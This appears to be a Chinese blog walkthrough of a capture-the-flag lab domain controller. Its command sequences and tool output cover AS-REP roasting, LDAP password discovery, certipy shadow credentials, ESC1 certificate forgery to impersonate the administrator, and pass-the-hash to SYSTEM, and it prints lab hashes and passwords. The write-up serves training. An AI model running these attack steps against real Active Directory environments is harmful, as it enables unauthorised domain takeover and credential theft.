Skip to main content

Confidence靶机-Maze-windows

·1616 words·8 mins
Windows Ldap
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you
Table of Contents

Confidence靶机-Maze-windows-ESC1
#

userflag
#

NMAP扫描端口

 nmap -sT -sC -p- 192.168.10.132 
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after:  2026-09-09T12:14:33
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after:  2026-09-09T12:14:33
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after:  2026-09-09T12:14:33
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
59557/tcp open  unknown
59558/tcp open  unknown
59565/tcp open  unknown
59574/tcp open  unknown
59580/tcp open  unknown
59610/tcp open  unknown
MAC Address: 00:0C:29:F7:7B:D8 (VMware)

Host script results:
| smb2-time: 
|   date: 2025-09-11T06:05:46
|_  start_date: N/A
|_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f7:7b:d8 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: -3s

Nmap done: 1 IP address (1 host up) scanned in 247.87 seconds
扫描完写入到hosts里面

先测试smb有无共享文件

└─# crackmapexec smb 192.168.10.132 -u '' -p '' --shares
SMB         192.168.10.132  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:confidence.com) (signing:True) (SMBv1:False)
SMB         192.168.10.132  445    DC               [+] confidence.com\: 
SMB         192.168.10.132  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

# smbclient -L //192.168.10.132                     
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      远程管理
        C$              Disk      默认共享
        IPC$            IPC       远程 IPC
        NETLOGON        Disk      Logon server share 
        readme          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.10.132 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

发现一个readme看看呢

└─# smbclient //192.168.10.132/readme 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep  9 09:25:09 2025
  ..                                DHS        0  Tue Sep  9 09:28:52 2025
  readme.txt.txt                      A      273  Tue Sep  9 09:25:11 2025

                12923135 blocks of size 4096. 7950004 blocks available
smb: \> get readme.txt.txt 
没发现什么信息
└─# cat /root/readme.txt.txt 
I've already disabled Windows Defender, and the system updates have been completed. So, enjoy exploring! If you run into any issues or get stuck, feel free to reach out to me, Wackymaker. My intention is simply to make sure everyone can learn something from this experience

smb可以匿名试试 lookid获取下用户

─# lookupsid.py lucy@192.168.10.132
/usr/local/lib/python3.10/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at 192.168.10.132
[*] StringBinding ncacn_np:192.168.10.132[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3649830887-1815587496-1699028491
498: CONFIDENCE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CONFIDENCE\Administrator (SidTypeUser)
501: CONFIDENCE\Guest (SidTypeUser)
502: CONFIDENCE\krbtgt (SidTypeUser)
512: CONFIDENCE\Domain Admins (SidTypeGroup)
513: CONFIDENCE\Domain Users (SidTypeGroup)
514: CONFIDENCE\Domain Guests (SidTypeGroup)
515: CONFIDENCE\Domain Computers (SidTypeGroup)
516: CONFIDENCE\Domain Controllers (SidTypeGroup)
517: CONFIDENCE\Cert Publishers (SidTypeAlias)
518: CONFIDENCE\Schema Admins (SidTypeGroup)
519: CONFIDENCE\Enterprise Admins (SidTypeGroup)
520: CONFIDENCE\Group Policy Creator Owners (SidTypeGroup)
521: CONFIDENCE\Read-only Domain Controllers (SidTypeGroup)
522: CONFIDENCE\Cloneable Domain Controllers (SidTypeGroup)
525: CONFIDENCE\Protected Users (SidTypeGroup)
526: CONFIDENCE\Key Admins (SidTypeGroup)
527: CONFIDENCE\Enterprise Key Admins (SidTypeGroup)
553: CONFIDENCE\RAS and IAS Servers (SidTypeAlias)
571: CONFIDENCE\Allowed RODC Password Replication Group (SidTypeAlias)
572: CONFIDENCE\Denied RODC Password Replication Group (SidTypeAlias)
1000: CONFIDENCE\DC$ (SidTypeUser)
1101: CONFIDENCE\DnsAdmins (SidTypeAlias)
1102: CONFIDENCE\DnsUpdateProxy (SidTypeGroup)
1103: CONFIDENCE\ca-admin (SidTypeGroup)
1104: CONFIDENCE\ca-user (SidTypeUser)
1105: CONFIDENCE\mulis (SidTypeUser)
1106: CONFIDENCE\hyh (SidTypeUser)

发现用户hyh mulis ca-user

然后用GetNPUsers.py 获取没有开启域认证的账号hash 成功获取mulis的然后用john解密

#GetNPUsers.py -usersfile /root/maze/conficenceuser.txt -no-pass -dc-ip  192.168.10.132 confidence.com/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hyh doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mulis@CONFIDENCE.COM:9757a526f685d1240449b7ccf2a4d87a$23f2b38d42eeddd793a20f980ab86d8e24807e64a9eeacef107b2e38258a8d154f8c8bc7ca17362af2ef366cd0fa87139a8f797a9b36ac1f478925688cbc16dd75d448e5a36a2da41c2dc8bd328ad51a2183b40c8d2e07386e79903d6a7cd021d4b549b774ea8f6c746f7551ca68dd5c93dd8779652c7995107c7bedd3d5521560c39f904c8cfd5e5ccf4b4625dd0ae684eebc34b0342fb654705d3965528c8edbac29ac6f2c2aa867e851b5df7a1a139e4f1a821ca7704b986dd400d6c53795b25639375d761c4ec6f46f96bb695b7123d6fc545930f3a8cd7104c75ab82fcf776831e1cfaea248a50a758bba1e5e9d
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set


#john --wordlist=/usr/share/wordlists/rockyou.txt  /root/maze/hash
babygirl         ($krb5asrep$23$mulis@CONFIDENCE.COM)

拿到后不知道干嘛了因为用evil登录不上去问问作者说查看ldap

ldapsearch -x -H ldap://192.168.10.132 -D "mulis@confidence.com" -w babygirl -b "DC=confidence,DC=com" "(objectClass=user)" sAMAccountName memberOf description servicePrincipalName

获取hyh有下面一串
# hyh, Users, confidence.com
dn: CN=hyh,CN=Users,DC=confidence,DC=com
description:: 6L+Z5p2h6Lev5piv5a+555qE77yM5L2G5piv5L2g55yL5Yiw55qE6L+Y5LiN5aSf
 5aSa
memberOf: CN=Remote Management Users,CN=Builtin,DC=confidence,DC=com
sAMAccountName: hyh
base64后转换为utf-8得到不全面 意思我们ldap不全换命令

ldapsearch -x -H ldap://192.168.10.132 -D "mulis@confidence.com" -w babygirl -b "CN=hyh,CN=Users,DC=confidence,DC=com" "*"

获得密码
info: Password: 3948571026
登录获得user

*Evil-WinRM* PS C:\Users\hyh> cd Desktop
*Evil-WinRM* PS C:\Users\hyh\Desktop> dir


    目录: C:\Users\hyh\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/9/2025   9:28 PM             34 user.txt

rootflag
#

这里用bloodhound获取信息

bloodhound-python -u hyh -p "3948571026" -d confidence.com -ns 192.168.10.132 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: confidence.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.confidence.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.confidence.com
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.confidence.com
INFO: Done in 00M 00S
INFO: Compressing output into 20250911042039_bloodhound.zip
放到里面

发送hyh对ca-user用户有可写权限直接可以获取他的hash 通过影子凭证

nmap

影子凭证
#

certipy shadow auto -username hyh@confidence.com -password 3948571026 -account ca-user -target dc.confidence.com -dc-ip 192.168.10.132

source certipy-3.12-env/bin/activate 激活虚拟环境工具要求3.11

└─# certipy shadow auto -username hyh@confidence.com -password 3948571026 -account ca-user -target dc.confidence.com -dc-ip 192.168.10.132
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca-user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6105a628c72a4425ae02b84c3ed67080'
[*] Adding Key Credential with device ID '6105a628c72a4425ae02b84c3ed67080' to the Key Credentials for 'ca-user'
[*] Successfully added Key Credential with device ID '6105a628c72a4425ae02b84c3ed67080' to the Key Credentials for 'ca-user'
[*] Authenticating as 'ca-user' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca-user@confidence.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca-user.ccache'
[*] Wrote credential cache to 'ca-user.ccache'
[*] Trying to retrieve NT hash for 'ca-user'
[*] Restoring the old Key Credentials for 'ca-user'
[*] Successfully restored the old Key Credentials for 'ca-user'
[*] NT hash for 'ca-user': 8636734a8c71b741a33bcb2bf323ea5c

获得了ca-user然后使用漏洞扫描扫描漏洞

└─# certipy find -username ca-user -hashes :8636734a8c71b741a33bcb2bf323ea5c -dc-ip 192.168.10.132 -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'confidence-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'confidence-DC-CA'
[*] Checking web enrollment for CA 'confidence-DC-CA' @ 'dc.confidence.com'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250911052914_Certipy.txt'
[*] Wrote text output to '20250911052914_Certipy.txt'
[*] Saving JSON output to '20250911052914_Certipy.json'
[*] Wrote JSON output to '20250911052914_Certipy.json'

cat 20250911052914_Certipy.txt
    [+] User Enrollable Principals      : CONFIDENCE.COM\Domain Computers
                                          CONFIDENCE.COM\ca-admin
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
发现漏洞ESC1

ESC1
#

1

└─# certipy req -u ca-user@confidence.com -hashes :8636734a8c71b741a33bcb2bf323ea5c \
  -ca confidence-DC-CA -target dc.confidence.com \
  -template ca-login \
  -upn administrator@confidence.com \
  -sid S-1-5-21-3649830887-1815587496-1699028491-500 \
  -out administrator \
  -dc-ip 192.168.10.132

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@confidence.com'
[*] Certificate object SID is 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): 
[*] Wrote certificate and private key to 'administrator_1abcd36f-ea00-404e-955c-50be33193359.pfx'


certipy req	certipy 的 “证书请求” 子命令,用于向域 CA 申请证书
-u ca-user@confidence.com	指定用于请求证书的账号:域用户 ca-user(UPN 格式,confidence.com 为目标域)
-hashes :8636734a8c71b741a33bcb2bf323ea5c	指定 ca-user 的 NTLM 哈希(: 前为空表示不使用 LM 哈希,仅用 NT 哈希;该哈希是 ca-user 的身份凭证,无需明文密码)
-ca confidence-DC-CA	指定目标域的证书颁发机构(CA)名称:confidence-DC-CA(通常域控会作为 CA,格式为 “域 - 域控 - CA”)
-target dc.confidence.com	指定证书请求的目标服务器:域控 dc.confidence.com(CA 服务运行在域控上)
-template ca-login	指定用于请求证书的 “证书模板”:ca-login(需是域内可用于身份认证的模板,且 ca-user 有该模板的申请权限)
-upn administrator@confidence.com	关键伪造参数:将证书的 “用户主体名(UPN)” 设为 administrator@confidence.com(即伪装成域管理员账号)
-sid S-1-5-21-...-500	关键伪造参数:将证书关联的 SID 设为管理员的 SID(-500 是域管理员的默认 SID,确保证书被识别为管理员身份)
-out administrator	指定输出文件前缀:生成的证书和私钥文件以 administrator 命名
-dc-ip 192.168.10.132	指定域控的 IP 地址:避免 DNS 解析问题,直接通过 IP 连接域控

2 获得NT hash

└─# certipy auth -pfx administrator_1abcd36f-ea00-404e-955c-50be33193359.pfx -dc-ip 192.168.10.132 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@confidence.com'
[*]     SAN URL SID: 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*]     Security Extension SID: 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*] Using principal: 'administrator@confidence.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): 
[*] Wrote credential cache to 'administrator_3460f055-68bf-49c8-a389-5a8afc641fee.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@confidence.com': aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34

certipy auth	certipy 的 “证书认证” 子命令,用于通过 PFX 证书完成 Kerberos 认证
-pfx administrator_xxx.pfx	指定上一步生成的伪造证书文件(包含管理员身份的证书和私钥)
-dc-ip 192.168.10.132	直接指定域控 IP,确保顺利连接

命令执行流程与结果

  1. 证书身份验证certipy 读取 PFX 文件中的证书,向域控证明 “自己是 administrator”(因证书的 UPN 和 SID 均为管理员信息);

  2. 获取 TGT:域控验证证书有效后,颁发 “票证授予票据(TGT)”(管理员权限的 TGT),并保存为 administrator_xxx.ccache(Kerberos 凭证缓存文件);

  3. 提取管理员哈希:利用管理员权限的 TGT,进一步从域控中读取 administrator 的 NT 哈希,最终输出结果: aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34

  4. 先利用 ca-user 的权限(可能是之前通过 GenericWrite 获取的权限),申请一张 “伪装成管理员” 的证书;

  5. 再用这张伪造证书完成域认证,获取管理员权限的 Kerberos 凭证,最终提取出管理员的 NT 哈希;

  6. 拿到管理员哈希后,可进一步通过 pass-the-hash(哈希传递)直接登录域控,实现完全控制。

登录

psexec.py administrator@192.168.10.132 -hashes aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34

4
/usr/local/lib/python3.10/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 192.168.10.132.....
[*] Found writable share ADMIN$
[*] Uploading file UTLKILTt.exe
[*] Opening SVCManager on 192.168.10.132.....
[*] Creating service bROc on 192.168.10.132.....
[*] Starting service bROc.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.4052]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����


C:\Windows\system32> whoami
nt authority\system

Related

fluffy-htb
·930 words·5 mins
Windows ESC16
Mount靶机-maze
·525 words·3 mins
Mountnfs Mount
vmware-esxi-vscenter-靶场vulntarget-o
·219 words·2 mins
Vmware Esxi Vscenter
poppips-mazasec
·1025 words·5 mins
Linux
Editor-htb
·260 words·2 mins
Xwiki